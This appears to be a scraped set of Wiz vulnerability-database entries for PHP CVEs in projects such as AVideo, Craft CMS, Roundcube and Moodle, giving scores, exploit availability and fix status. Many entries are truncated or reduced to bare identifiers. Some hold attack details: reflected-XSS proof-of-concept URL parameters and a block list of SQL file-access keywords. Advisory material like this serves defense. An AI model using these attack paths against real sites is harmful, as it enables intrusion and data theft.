CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
roundcube
roundcube/roundcubemail
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM Has Fix Added at: Apr 05, 2026
Echo Severity MEDIUM Has
Wiz
CVE-2026-33650 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.6
CVE-2026-33650 [HIGH] CVE-2026-33650 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33650 :
PHP vulnerability analysis and mitigation
Permissions::canModerateVideos()
videoAddNew.json.php
videoDelete.json.php
Source : NVD
## 7.6
Score
Published March 23, 2026
Severity HIGH
CNA Score 7.6
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV expl
Wiz
CVE-2025-70958 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-70958 [MEDIUM] CVE-2025-70958 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-70958 :
PHP vulnerability analysis and mitigation
Multiple reflected cross-site scripting (XSS) vulnerabilities in the installation module of Subrion CMS v4.2.1 allows attackers to execute arbitrary Javascript in the context of the user's browser via injecting a crafted payload into the dbuser, dbpwd, and dbname parameters.
Source : NVD
## 6.1
Score
Published February 2, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
intelliants/subrion
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Feb 04, 2026
## Get a CVE risk assessment
Wiz
CVE-2026-34557 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-34557 [CRITICAL] CVE-2026-34557 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34557 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within group and role management functionality. Multiple input fields (three distinct group-related fields) can be injected with malicious JavaScript payloads, which are then stored server-side. These stored payloads are later rendered unsafely within privileged administrative views without proper output encoding, leading to stored cross-site scripting (XSS) within the role and permission management context. This issue has been patched in version 0.31.0.0.
Source : NVD
## 9
Score
Published M
Wiz
CVE-2026-34395 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-34395 [MEDIUM] CVE-2026-34395 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34395 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the plugin/YPTWallet/view/users.json.php endpoint returns all platform users with their personal information and wallet balances to any authenticated user. The endpoint checks User::isLogged() but does not check User::isAdmin(), so any registered user can dump the full user database. At time of publication, there are no publicly available patches.
Source : NVD
## 6.5
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.6
Exploitation Probability (EPSS) N/A
Affected p
Wiz
CVE-2025-14761 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.0
CVE-2025-14761 [MEDIUM] CVE-2025-14761 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14761 :
PHP vulnerability analysis and mitigation
Missing cryptographic key commitment in the AWS SDK for PHP may allow a user with write access to the S3 bucket to introduce a new EDK that decrypts to different plaintext when the encrypted data key is stored in an "instruction file" instead of S3's metadata record.
To mitigate this issue, upgrade AWS SDK for PHP to version 3.368.0 or later
Source : NVD
## 6
Score
Published December 17, 2025
Severity MEDIUM
CNA Score 6.0
Affected Technologies
PHP
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
nextcloud-server-31
nextcloud-server-32
Sources
Wiz
CVE-2026-35542 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-35542 [MEDIUM] CVE-2026-35542 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35542 :
PHP vulnerability analysis and mitigation
An issue was discovered in Roundcube Webmail before 1.5.14 and 1.6.14. The remote image blocking feature can be bypassed via a crafted background attribute of a BODY element in an e-mail message. This may lead to information disclosure or access-control bypass.
Source : NVD
## 5.3
Score
Published April 3, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
roundcube/roundcubemail
roundcube
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM Has Fix Added at: Apr 05, 2026
Echo S
Wiz
CVE-2026-33294 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.0
CVE-2026-33294 [MEDIUM] CVE-2026-33294 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33294 :
PHP vulnerability analysis and mitigation
plugin/BulkEmbed/save.json.php
url_get_contents()
isSSRFSafeURL()
Source : NVD
## 4.3
Score
Published March 22, 2026
Severity MEDIUM
CNA Score 5.0
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Wiz
CVE-2026-28695 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-28695 [MEDIUM] CVE-2026-28695 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28695 :
PHP vulnerability analysis and mitigation
Craft is a content management system (CMS). There is an authenticated admin RCE in Craft CMS 5.8.21 via Server-Side Template Injection using the create() Twig function combined with a Symfony Process gadget chain. The create() Twig function exposes Craft::createObject(), which allows instantiation of arbitrary PHP classes with constructor arguments. Combined with the bundled symfony/process dependency, this enables RCE. This bypasses the fix implemented for CVE-2025-57811 (patched in 5.8.7). This vulnerability is fixed in 5.9.0-beta.1 and 4.17.0-beta.1.
Source : NVD
## 7.5
Score
Published March 4, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
C
Wiz
CVE-2026-26016 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
CVE-2026-26016 [CRITICAL] CVE-2026-26016 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26016 :
PHP vulnerability analysis and mitigation
/etc/pterodactyl/config.yml
Source : NVD
## 9.2
Score
Published February 19, 2026
Severity CRITICAL
CNA Score 9.2
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 19.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
pterodactyl/panel
Sources
NVD
Composer Severity CRITICAL Has Fix Added at: Feb 18, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
G
Wiz
CVE-2026-33161 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 1.3
CVE-2026-33161 [LOW] CVE-2026-33161 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33161 :
PHP vulnerability analysis and mitigation
Craft CMS is a content management system (CMS). From version 4.0.0-RC1 to before version 4.17.8 and from version 5.0.0-RC1 to before version 5.9.14, a low-privileged authenticated user can call assets/image-editor with the ID of a private asset they cannot view and still receive editor response data, including focalPoint. The endpoint returns private editing metadata without per-asset authorization validation. This issue has been patched in versions 4.17.8 and 5.9.14.
Source : NVD
## 1.3
Score
Published March 24, 2026
Severity LOW
CNA Score 1.3
Affected Technologies
PHP
Craft CMS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EP
Wiz
CVE-2025-67853 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-67853 [HIGH] CVE-2025-67853 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67853 :
PHP vulnerability analysis and mitigation
A flaw was found in Moodle. A remote attacker could exploit a lack of proper rate limiting in the confirmation email service. This vulnerability allows attackers to more easily enumerate or guess user credentials, facilitating brute-force attacks against user accounts.
Source : NVD
## 7.5
Score
Published February 3, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
moodle
moodle/moodle
Sources
NVD
Composer Severity HIGH Has Fix Added at: Feb 04, 2026
Nix Severity HIGH Has Fix Added a
Wiz
CVE-2025-68951 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2025-68951 [MEDIUM] CVE-2025-68951 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68951 :
PHP vulnerability analysis and mitigation
phpMyFAQ is an open source FAQ web application. Versions 4.0.14 and 4.0.15 have a stored cross-site scripting (XSS) vulnerability that allows an attacker to execute arbitrary JavaScript in an administrator’s browser by registering a user whose display name contains HTML entities. When an administrator views the admin user list, the payload is decoded server-side and rendered without escaping, resulting in script execution in the admin context. Version 4.0.16 contains a patch for the issue.
Source : NVD
## 6.1
Score
Published December 29, 2025
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probabili
Wiz
CVE-2026-31887 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.9
CVE-2026-31887 [HIGH] CVE-2026-31887 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31887 :
PHP vulnerability analysis and mitigation
Shopware is an open commerce platform. Prior to 6.7.8.1 and 6.6.10.15, an insufficient check on the filter types for unauthenticated customers allows access to orders of other customers. This is part of the deepLinkCode support on the store-api.order endpoint. This vulnerability is fixed in 6.7.8.1 and 6.6.10.15.
Source : NVD
## 8.9
Score
Published March 11, 2026
Severity HIGH
CNA Score 8.9
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
shopware/core
shopware/platform
Sources
NVD
Composer Severity HIGH Has Fix Added at:
Wiz
CVE-2026-29177 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 1.9
CVE-2026-29177 [LOW] CVE-2026-29177 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29177 :
PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. Prior to 4.10.2 and 5.5.3, a Stored Cross-Site Scripting (XSS) vulnerability exists in the Craft Commerce Order details. Malicious JavaScript can be injected via the Shipping Method Name, Order Reference, or Site Name. When a user opens the order details slideout via a double-click on the order index page, the injected payload executes. This vulnerability is fixed in 4.10.2 and 5.5.3.
Source : NVD
## 1.9
Score
Published March 10, 2026
Severity LOW
CNA Score 1.9
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.1
Exploitation Probability (EPSS)
Wiz
CVE-2026-27599 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.7
CVE-2026-27599 [MEDIUM] CVE-2026-27599 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27599 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within System Settings – Mail Settings. Several configuration fields, including Mail Server, Mail Port, Email Address, Email Password, Mail Protocol, and TLS settings, accept attacker-controlled input that is stored server-side and later rendered without proper output encoding. This issue has been patched in version 0.31.0.0.
Source : NVD
## 7.2
Score
Published March 30, 2026
Severity HIGH
CNA Score 4.7
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV
Wiz
GHSA-6w82-v552-wjw2 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-6w82-v552-wjw2 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-6w82-v552-wjw2 :
PHP vulnerability analysis and mitigation
## Impact
By exploiting the XSS vulnerabilities, malicious actors can perform harmful actions in the user's web browser in the session context of the affected user. Some examples of this include, but are not limited to: Obtaining user session tokens. Performing administrative actions (when an administrative user is affected). These vulnerabilities pose a high security risk. Since a sensitive cookie is not configured with the HttpOnly attribute and administrator JWTs are stored in sessionStorage, any successful XSS attack could enable the theft of session cookies and administrative tokens.
## Description
waitTime
/account/login?loginError=1&waitTime=Here
errorSnippet
/account/login?loginError=1&errorSnippet=Reset%
Wiz
CVE-2026-32279 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2026-32279 [MEDIUM] CVE-2026-32279 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32279 :
PHP vulnerability analysis and mitigation
Connect-CMS is a content management system. In versions on the 1.x series up to and including 1.41.0 and versions on the 2.x series up to and including 2.41.0, a Server-Side Request Forgery (SSRF) issue exists in the external page migration feature of the Page Management Plugin. Versions 1.41.1 and 2.41.1 contain a patch.
Source : NVD
## 6.8
Score
Published March 23, 2026
Severity MEDIUM
CNA Score 6.8
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
opensource-workshop/connect-cms
Sources
NVD
Composer Severity MEDIUM Has F
Wiz
CVE-2026-25514 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-25514 [HIGH] CVE-2026-25514 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25514 :
PHP vulnerability analysis and mitigation
FacturaScripts is open-source enterprise resource planning and accounting software. Prior to version 2025.81, FacturaScripts contains a critical SQL injection vulnerability in the autocomplete functionality that allows authenticated attackers to extract sensitive data from the database including user credentials, configuration settings, and all stored business data. The vulnerability exists in the CodeModel::all() method where user-supplied parameters are directly concatenated into SQL queries without sanitization or parameterized binding. This issue has been patched in version 2025.81.
Source : NVD
## 8.7
Score
Published February 4, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit Yes
Wiz
CVE-2021-47763 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2021-47763 [HIGH] CVE-2021-47763 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2021-47763 :
PHP vulnerability analysis and mitigation
Aimeos 2021.10 LTS contains a SQL injection vulnerability in the json api 'sort' parameter that allows attackers to inject malicious database queries. Attackers can manipulate the sort parameter to reveal table and column names by sending crafted GET requests to the jsonapi/review endpoint.
Source : NVD
## 8.8
Score
Published January 15, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
aimeos/aimeos-laravel
Sources
NVD
Composer Severity HIGH No Fix Added at: Jan 18, 2026
## Get a CVE risk
Wiz
CVE-2026-26047 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-26047 [MEDIUM] CVE-2026-26047 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26047 :
PHP vulnerability analysis and mitigation
A denial-of-service vulnerability was identified in Moodle’s TeX formula editor. When rendering TeX content using mimetex, insufficient execution time limits could allow specially crafted formulas to consume excessive server resources. An authenticated user could abuse this behavior to degrade performance or cause service interruption.
Source : NVD
## 6.5
Score
Published February 21, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
moodle
moodle/moodle
Sources
NVD
Composer Severit
Wiz
CVE-2026-1193 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-1193 [MEDIUM] CVE-2026-1193 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1193 :
PHP vulnerability analysis and mitigation
A vulnerability was identified in MineAdmin 1.x/2.x. The impacted element is an unknown function of the file /system/cache/view of the component View Interface. The manipulation leads to improper authorization. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 5.3
Score
Published January 19, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
Wiz
CVE-2026-33885 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-33885 [MEDIUM] CVE-2026-33885 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33885 :
PHP vulnerability analysis and mitigation
Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.16 and 6.7.2, the external URL detection used for redirect validation on unauthenticated endpoints could be bypassed, allowing users to be redirected to external URLs after actions like form submissions and authentication flows. This has been fixed in 5.73.16 and 6.7.2.
Source : NVD
## 6.1
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
statamic/cms
Sources
NVD
Composer
Wiz
CVE-2026-21451 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.2
CVE-2026-21451 [MEDIUM] CVE-2026-21451 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21451 :
PHP vulnerability analysis and mitigation
Source : NVD
## 5.2
Score
Published January 2, 2026
Severity MEDIUM
CNA Score 5.2
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
bagisto/bagisto
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Jan 03, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h6rj-3m53-887h
HIGH
7.5
PHP
poc
Wiz
CVE-2026-29905 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-29905 [MEDIUM] CVE-2026-29905 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29905 :
PHP vulnerability analysis and mitigation
Kirby CMS through 5.1.4 allows an authenticated user with 'Editor' permissions to cause a persistent Denial of Service (DoS) via a malformed image upload. The application fails to properly validate the return value of the PHP getimagesize() function. When the system attempts to process this file for metadata or thumbnail generation, it triggers a fatal TypeError.
Source : NVD
## 6.5
Score
Published March 26, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
getkirby/cms
Sources
NVD
Compos
Wiz
CVE-2026-27621 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2026-27621 [MEDIUM] CVE-2026-27621 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27621 :
PHP vulnerability analysis and mitigation
viewBox
viewBox
Source : NVD
## 6.8
Score
Published February 25, 2026
Severity MEDIUM
CNA Score 6.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
typicms/core
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Mar 02, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h6rj-3m53-887h
Wiz
CVE-2026-27836 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-27836 [HIGH] CVE-2026-27836 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27836 :
PHP vulnerability analysis and mitigation
/api/webauthn/prepare
Source : NVD
## 7.5
Score
Published February 27, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
thorsten/phpmyfaq
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 02, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h6rj-3m53
Wiz
CVE-2026-33647 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-33647 [HIGH] CVE-2026-33647 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33647 :
PHP vulnerability analysis and mitigation
ImageGallery::saveFile()
finfo
.php
.php
Source : NVD
## 8.8
Score
Published March 23, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 52.5
Exploitation Probability (EPSS) 0.3
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GH
Wiz
CVE-2026-30932 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-30932 [HIGH] CVE-2026-30932 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30932 :
PHP vulnerability analysis and mitigation
Froxlor is open source server administration software. Prior to version 2.3.5, the DomainZones.add API endpoint (accessible to customers with DNS enabled) does not validate the content field for several DNS record types (LOC, RP, SSHFP, TLSA). An attacker can inject newlines and BIND zone file directives (e.g. $INCLUDE) into the zone file that gets written to disk when the DNS rebuild cron job runs. This issue has been patched in version 2.3.5.
Source : NVD
## 8.6
Score
Published March 24, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.2
Exploitation Probabilit
Wiz
CVE-2026-32265 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-32265 [MEDIUM] CVE-2026-32265 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32265 :
PHP vulnerability analysis and mitigation
BucketsController->actionLoadBucketData()
Source : NVD
## 6.9
Score
Published March 18, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
craftcms/aws-s3
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Mar 17, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published dat
Wiz
CVE-2025-65854 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2025-65854 [CRITICAL] CVE-2025-65854 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-65854 :
PHP vulnerability analysis and mitigation
Insecure permissions in the scheduled tasks feature of MineAdmin v3.x allows attackers to execute arbitrary commands and execute a full account takeover.
Source : NVD
## 9.8
Score
Published December 12, 2025
Severity CRITICAL
CNA Score 9.8
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 28.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
mineadmin/mineadmin
Sources
NVD
Composer Severity CRITICAL No Fix Added at: Dec 14, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Rel
Wiz
GHSA-j8g6-5gqc-mq36 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-j8g6-5gqc-mq36 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-j8g6-5gqc-mq36 :
PHP vulnerability analysis and mitigation
## Impact
MySQLSelectTool
SELECT
INTO OUTFILE
INTO DUMPFILE
FILE
MySQLSelectTool
## Patches
Not patched in: 2.8.11
Fixed in: 2.8.12
Recommended fix direction:
INTO
OUTFILE
DUMPFILE
LOAD_FILE
Prefer AST-based validation (SQL parser) over keyword checks.
Constrain allowed tables/columns and disallow multi-statements.
## Workarounds
If you cannot upgrade immediately:
MySQLSelectTool
FILE
secure_file_priv
INTO OUTFILE
INTO DUMPFILE
LOAD_FILE
;
Source : NVD
## 8.2
Score
Published December 9, 2025
Severity HIGH
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS)
Wiz
GHSA-5724-x3rh-5qqq Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-5724-x3rh-5qqq Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-5724-x3rh-5qqq :
PHP vulnerability analysis and mitigation
## Summary
Multiple reflected Cross-site Scripting (XSS) vulnerabilities across both authenticated and unauthenticated portions of the application. These findings present a significant security risk, as they can be leveraged to execute arbitrary JavaScript in a victim’s browser under various contexts.
## Impact and Exploitation
While XSS is often treated as a standalone issue, these vulnerabilities have broader implications. Specifically, they can be used as launch points to exploit other significant vulnerabilities .
Proof of concept links follow. All testing was performed on my local docker setup running the lastest version of the application.
## Proof of Concepts
## Authenticated Reflected XSS
http://localh
Wiz
CVE-2026-32277 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-32277 [HIGH] CVE-2026-32277 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32277 :
PHP vulnerability analysis and mitigation
Connect-CMS is a content management system. In versions 1.35.0 through 1.41.0 and 2.35.0 through 2.41.0, a DOM-based Cross-Site Scripting (XSS) issue exists in the Cabinet Plugin list view. Versions 1.41.1 and 2.41.1 contain a patch.
Source : NVD
## 8.7
Score
Published March 23, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
opensource-workshop/connect-cms
